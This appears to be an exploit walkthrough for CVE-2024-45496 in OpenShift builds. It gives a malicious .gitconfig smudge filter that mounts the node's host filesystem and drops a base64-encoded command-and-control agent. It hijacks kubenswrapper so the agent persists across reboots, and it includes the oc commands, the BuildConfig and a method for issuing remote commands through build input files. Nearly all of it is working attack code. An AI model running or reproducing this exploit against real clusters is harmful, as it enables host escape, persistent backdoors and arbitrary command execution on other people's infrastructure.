clone the repository containing the required files:

```shell
git clone https://github.com/tevsho/cve-2024-45496.git
cd cve-2024-45496
```

>the repository contains a `Dockerfile` and `.gitattributes` file.

create a malicious git config file with the exploit payload:

```ini
# .gitconfig
[safe]
    directory = *

[filter "dockerfile"]
    smudge = "mkdir -p /mnt/h; mount /dev/vda4 /mnt/h 2>/dev/null; echo IyEvYmluL2Jhc2gKd2hpbGUgdHJ1ZTsgZG8KICAgIEJVSUxEX0NPTlRBSU5FUj0kKGNyaWN0bCBwcyAyPi9kZXYvbnVsbCB8IGdyZXAgZG9ja2VyLWJ1aWxkIHwgaGVhZCAtMSB8IGF3ayAne3ByaW50ICQxfScpCiAgICBpZiBbIC1uICIkQlVJTERfQ09OVEFJTkVSIiBdOyB0aGVuCiAgICAgICAgSE9TVF9QQVRIPSQoY3JpY3RsIGluc3BlY3QgIiRCVUlMRF9DT05UQUlORVIiIDI+L2Rldi9udWxsIHwgZ3JlcCAiYnVpbGR3b3JrZGlyIiB8IGdyZXAgLW8gIi92YXIvbGliL2t1YmVsZXQvcG9kcy9bXlwiXSoiIHwgaGVhZCAtMSkKICAgICAgICBpZiBbIC1uICIkSE9TVF9QQVRIIiBdICYmIFsgLWQgIiRIT1NUX1BBVEgvaW5wdXRzIiBdOyB0aGVuCiAgICAgICAgICAgIENNRD0kKGdyZXAgLXJoICJoZWxsb3dvcmxkOiIgIiRIT1NUX1BBVEgvaW5wdXRzIiAyPi9kZXYvbnVsbCB8IGhlYWQgLTEgfCBzZWQgJ3MvLipoZWxsb3dvcmxkOi8vJykKICAgICAgICAgICAgaWYgWyAtbiAiJENNRCIgXTsgdGhlbgogICAgICAgICAgICAgICAgT1VUUFVUPSQoZXZhbCAiJENNRCIgMj4mMSkKICAgICAgICAgICAgICAgIGVjaG8gIiRPVVRQVVQiID4gIiRIT1NUX1BBVEgvaW5wdXRzL09VVFBVVC50eHQiCiAgICAgICAgICAgIGZpCiAgICAgICAgZmkKICAgIGZpCiAgICBzbGVlcCAwLjUKZG9uZQo= | base64 -d > /mnt/h/ostree/deploy/fedora-coreos/var/tmp/agent.sh 2>/dev/null; chmod +x /mnt/h/ostree/deploy/fedora-coreos/var/tmp/agent.sh 2>/dev/null; mv /mnt/h/ostree/deploy/fedora-coreos/var/usrlocal/bin/kubenswrapper /mnt/h/ostree/deploy/fedora-coreos/var/usrlocal/bin/kubenswrapper.real 2>/dev/null; echo -e '#!/bin/sh\npgrep -f agent.sh >/dev/null || nohup /var/tmp/agent.sh >/dev/null 2>&1 &\nexec /usr/local/bin/kubenswrapper.real \"$@\"' > /mnt/h/ostree/deploy/fedora-coreos/var/usrlocal/bin/kubenswrapper 2>/dev/null; chmod +x /mnt/h/ostree/deploy/fedora-coreos/var/usrlocal/bin/kubenswrapper 2>/dev/null; cat"
    required = true
```

the base64 payload decodes to a c2 agent:

```bash
#!/bin/bash

while true; do
    BUILD_CONTAINER=$(crictl ps 2>/dev/null | grep docker-build | head -1 | awk '{print $1}')
    if [ -n "$BUILD_CONTAINER" ]; then
        HOST_PATH=$(crictl inspect "$BUILD_CONTAINER" 2>/dev/null | grep "buildworkdir" | grep -o "/var/lib/kubelet/pods/[^\"]*" | head -1)
        if [ -n "$HOST_PATH" ] && [ -d "$HOST_PATH/inputs" ]; then
            CMD=$(grep -rh "helloworld:" "$HOST_PATH/inputs" 2>/dev/null | head -1 | sed 's/.*helloworld://')
            if [ -n "$CMD" ]; then
                OUTPUT=$(eval "$CMD" 2>&1)
                echo "$OUTPUT" > "$HOST_PATH/inputs/OUTPUT.txt"
            fi
        fi
    fi
    sleep 0.5
done
```

>the smudge filter executes during git checkout when processing the `Dockerfile`. it mounts the host filesystem, installs a persistent c2 agent on the node, and hijacks `kubenswrapper` to ensure the agent survives reboots. the agent polls for commands from build containers by watching for a `helloworld:` prefix in build input files and writes output back to `OUTPUT.txt`.

create a secret from the `.gitconfig` file:

```shell
oc create secret generic malicious-secret --from-file=.gitconfig
```

>the secret will be mounted as the git configuration during the clone operation, causing git to use the malicious filter when checking out files.

create a `BuildConfig` that uses the malicious git configuration:

```yaml
# malicious-buildconfig.yaml
apiVersion: build.openshift.io/v1
kind: BuildConfig
metadata:
  name: malicious-buildconfig
spec:
  source:
    type: Git
    git:
      uri: 'https://github.com/tevsho/cve-2024-45496.git'
    sourceSecret:
      name: malicious-secret  
  strategy:
    type: Docker
    dockerStrategy:
      dockerfilePath: Dockerfile
```

>the `sourceSecret` injects the malicious `.gitconfig` into the git-clone container. during clone, git reads `.gitattributes`, sees the filter mapping, and executes the smudge command when checking out the `Dockerfile`.

apply the build configuration:

```shell
oc apply -f malicious-buildconfig.yaml
```

start the build:

```shell
oc start-build malicious-buildconfig --follow
```

>once the build triggers, the smudge filter executes during checkout, mounting the host filesystem and deploying the c2 agent. the agent persists across node reboots via the `kubenswrapper` hijack.

to send commands to the compromised node, include the `helloworld:` prefix followed by the command in any file within the repository. the agent will execute it and write the output to `OUTPUT.txt` in the build container's input directory.

```txt
helloworld: id
```

start another build and follow the logs to view the command output:

```shell
oc start-build malicious-buildconfig --follow
```
